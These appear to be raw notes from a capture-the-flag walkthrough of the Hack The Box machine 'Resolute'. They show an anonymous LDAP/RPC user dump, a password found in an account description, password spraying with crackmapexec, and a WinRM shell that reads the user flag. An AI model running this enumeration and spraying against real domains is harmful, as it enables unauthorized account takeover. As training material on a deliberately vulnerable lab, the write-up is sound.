Nmap scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 08:42 EDT
Nmap scan report for 10.10.10.169
Host is up (0.30s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-15 12:50:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open `gGV Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2023-09-15T12:51:18
|_ start_date: 2023-09-15T12:49:30
|_clock-skew: mean: 2h27m04s, deviation: 4h02m31s, median: 7m03s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2023-09-15T05:51:19-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.59 seconds
┌──(kali㉿kali)-[~/HTB/resolute]
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u "" up ""
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
┌──(kali㉿kali)-[~/HTB/resolute]
smbclient
└─$ smbclient -L //10.10.10.169
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Add the domain to the hosts file
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local
ldapsearch and we get some users
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
DefaultAccount
RESOLUTE$
MS02$
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
┌──(kali㉿kali)-[~/HTB/resolute]
└─$
Add the users to a text file called users.txt and well use kerbrute and all pretty much valid
well check if we can get any hashes. We will check recursively through the list using
while read -r user; do
./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.169
done < /home/kali/HTB/resolute/users.txt
we do not get anything for the users
done < /home/kali/HTB/resolute/users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for RESOLUTE$
[-] User RESOLUTE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for MS02$
[-] User MS02$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for ryan
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for marko
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for sunita
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for abigail
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for marcus
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for sally
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for fred
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for angela
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for felicia
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for gustavo
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for ulf
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for stevie
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for claire
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for paulo
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for steve
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for annette
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for annika
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for per
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for claude
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for melanie
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for zach
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for simon
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for naoki
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
tried rpcclient
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient 10.10.10.169 -U ''
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.169 -request 'megabank.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
No entries found!
┌──(kali㉿k
enum4linux
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ enum4linux -S 10.10.10.169
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Sep 15 09:12:26 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.169 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.10.169 )===================================
[+] Server 10.10.10.169 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.169 )================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.10.169 )=================================
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.169
enum4linux complete on Fri Sep 15 09:12:46 2023
tried smb again
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.169 -u '' -p ''
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U%
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U% --max-protocol=SMB2
tried to enumerate "Domain Sid: S-1-5-21-1392959593-3013219662-3596683436" using ridenum.py
└─$ ./ridenum.py 10.10.10.169 500 550
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information:
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[*] Moving on to extract via RID cycling attack..
[*] Enumerating user accounts.. This could take a little while.
[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.
[*] Attempting enumdomusers to enumerate users...
[!] Sorry. RIDENUM failed to successfully enumerate users. Bummers.
password policy
└─$ crackmapexec smb 10.10.10.169 --pass-pol
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] Dumping password info for domain: MEGABANK
SMB 10.10.10.169 445 RESOLUTE Minimum password length: 7
SMB 10.10.10.169 445 RESOLUTE Password history length: 24
SMB 10.10.10.169 445 RESOLUTE Maximum password age: Not Set
SMB 10.10.10.169 445 RESOLUTE
SMB 10.10.10.169 445 RESOLUTE Password Complexity Flags: 000000
SMB 10.10.10.169 445 RESOLUTE Domain Refuse Password Change: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password Store Cleartext: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password Lockout Admins: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password No Clear Change: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password No Anon Change: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password Complex: 0
SMB 10.10.10.169 445 RESOLUTE
SMB 10.10.10.169 445 RESOLUTE Minimum password age: 1 day 4 minutes
SMB 10.10.10.169 445 RESOLUTE Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.169 445 RESOLUTE Locked Account Duration: 30 minutes
SMB 10.10.10.169 445 RESOLUTE Account Lockout Threshold: None
SMB 10.10.10.169 445 RESOLUTE Forced Log off Time: Not Set
┌──(kali㉿kali)-[~/Downloads]
custom objects via ldapsearch –ldapsearch -x -H ldap://10.10.10.182 -b ‘DC=cascade,DC=local’ -s sub | awk ‘{print $1}’ | sort | uniq -c | sort -nr
Found some ippsec information but nothing further after filtering for them using
┌──(kali㉿kali)-[~/Downloads]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=*)' sAMAccountName ipsecID ipsecDataType ipsecData:: ipsecOwnersReference ipsecName ipsecNFAReference ipsecNegotiationPolicyReference ipsecFilterReference | awk -F ': ' '
/sAMAccountName/ { username=$2 }
/ipsecID/ { ipsecid=$2 }
/ipsecDataType/ { ipsecdatatype=$2 }
/ipsecData::/ { ipsecdata=$2 }
/ipsecOwnersReference/ { ipsecownersref=$2 }
/ipsecName/ { ipsecname=$2 }
/ipsecNFAReference/ { ipsecnfaref=$2 }
/ipsecNegotiationPolicyReference/ { ipsecnegpolref=$2 }
/ipsecFilterReference/ { ipsecfilterref=$2 }
{ print username ": " ipsecid ", " ipsecdatatype ", " ipsecdata ", " ipsecownersref ", " ipsecname ", " ipsecnfaref ", " ipsecnegpolref ", " ipsecfilterref }'
: , , , , , , ,
: , , , , , , ,
: , , , , , , ,
: , , , , , , ,
: , , , , , , ,
sAMAccountName ipsecID ipsecDataType ipsecData:: sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:
sAMAccountName ipsecID ipsecDataType ipsecData:: sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:, sAMAccountName ipsecID ipsecDataType ipsecData:
tried rpcclient but with the following command – rpcclient -U ” -N 10.10.10.169 –> without asking for password
┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169
enumerate the users we get the same list we already have with ldapsearch
rpcclient
gt; enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclientgt;
we run querydisplay info and we find password under username Marko Novakrpcclient
gt; querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
rpcclientgt;
Going to use ldapsearch to try and see if we can enumarte this information by searching descripton - ldapsearch -x -H ldap://10.10.10.169 -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName descriptionWe get the same information - password - Welcome123!
┌──(kali㉿kali)-[~/HTB/resolute] └─$ ldapsearch -x -H ldap://10.10.10.169 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description # extended LDIF # # LDAPv3 # base <DC=megabank,DC=local> with scope subtree # filter: (objectClass=user) # requesting: sAMAccountName description # # Guest, Users, megabank.local dn: CN=Guest,CN=Users,DC=megabank,DC=local description: Built-in account for guest access to the computer/domain sAMAccountName: Guest # DefaultAccount, Users, megabank.local dn: CN=DefaultAccount,CN=Users,DC=megabank,DC=local description: A user account managed by the system. sAMAccountName: DefaultAccount # RESOLUTE, Domain Controllers, megabank.local dn: CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local sAMAccountName: RESOLUTE$ # MS02, Computers, megabank.local dn: CN=MS02,CN=Computers,DC=megabank,DC=local sAMAccountName: MS02$ # Ryan Bertrand, Contractors, MegaBank Users, megabank.local dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local sAMAccountName: ryan # Marko Novak, Employees, MegaBank Users, megabank.local dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local description: Account created. Password set to Welcome123! sAMAccountName: marko
try crackmapexec but failed
┌──(kali㉿kali)-[~/HTB/resolute] └─$ crackmapexec smb 10.10.10.169 -u marko -p 'Welcome123!' --shares SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE ┌──(kali㉿kali)-[~/HTB/resolute] └─$ Welcome123! ┌──(kali㉿kali)-[~/HTB/resolute] └─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!' SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE ┌──(kali㉿kali)-[~/HTB/resolute] └─$ crackmapexec winrm 10.10.10.169 --shares -u marko -p 'Welcome123!' usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,smb,mssql,rdp,ftp,winrm,ssh} ... crackmapexec: error: unrecognized arguments: --shares ┌──(kali㉿kali)-[~/HTB/resolute] └─$ crackmapexec winrm 10.10.10.169 -u marko -p 'Welcome123!' SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local) HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman WINRM 10.10.10.169 5985 RESOLUTE [-] megabank.local\marko:Welcome123! ┌──(kali㉿kali)-[~/HTB/resolute] └─$ rpcclient 10.10.10.169 -U marko Password for [WORKGROUP\marko]: Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
found a typo in my hosts file i.e localx instead of local. also added resolute.megabank.local
127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.10.10.175 EGOTISTICAL-BANK.LOCAL 10.10.10.100 active.htb htb 10.10.10.161 htb.local 10.10.10.192 blackfield.local 10.10.10.182 cascade.local 10.10.11.152 timelapse.htb 10.10.10.169 megabank.localx
127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.10.10.175 EGOTISTICAL-BANK.LOCAL 10.10.10.100 active.htb htb 10.10.10.161 htb.local 10.10.10.192 blackfield.local 10.10.10.182 cascade.local 10.10.11.152 timelapse.htb 10.10.10.169 megabank.local resolute.megabank.local
still no luck with smb
┌──(kali㉿kali)-[~/HTB/resolute] └─$ crackmapexec smb 10.10.10.169 --shares -u marko -p 'Welcome123!' SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE ┌──(kali㉿kali)-[~/HTB/resolute] └─$ evil-winrm -i 10.10.10.169 -u marko -p 'Welcome123!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError Error: Exiting with code 1
tried netsharenum via rpcclient
┌──(kali㉿kali)-[~] └─$ rpcclient -U '' -N 10.10.10.169 rpcclient
gt; netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclientgt; netshareenum^C
tried to use nmap - nmap -p 445 --script smb-enum-shares 10.10.10.169 -Pn - no luck┌──(kali㉿kali)-[~] └─$ nmap -p 445 --script smb-enum-shares 10.10.10.169 -Pn Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 22:28 EDT Stats: 0:05:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 0.00% done
check each user against the password and we get melanie at the end
└─$ crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\administrator:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\RESOLUTE$:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\MS02$:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
enumarate winrm with crackmaoexec and we get pawned. we then use evilwinrm. we get the flag
┌──(kali㉿kali)-[~/HTB/resolute] └─$ crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!' SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local) HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!) ┌──(kali㉿kali)-[~/HTB/resolute] └─$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\melanie\Documents> cd ../ *Evil-WinRM* PS C:\Users\melanie> cd Desktop *Evil-WinRM* PS C:\Users\melanie\Desktop> ls Directory: C:\Users\melanie\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 9/15/2023 7:03 PM 34 user.txt *Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt fb18e2daec48bf3f4ff7430139441feb *Evil-WinRM* PS C:\Users\melanie\Desktop>
checking shares that melanie can read
└─$ crackmapexec smb 10.10.10.169 -u melanie -p Welcome123! --shares SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123! SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------ SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin SMB 10.10.10.169 445 RESOLUTE C$ Default share SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
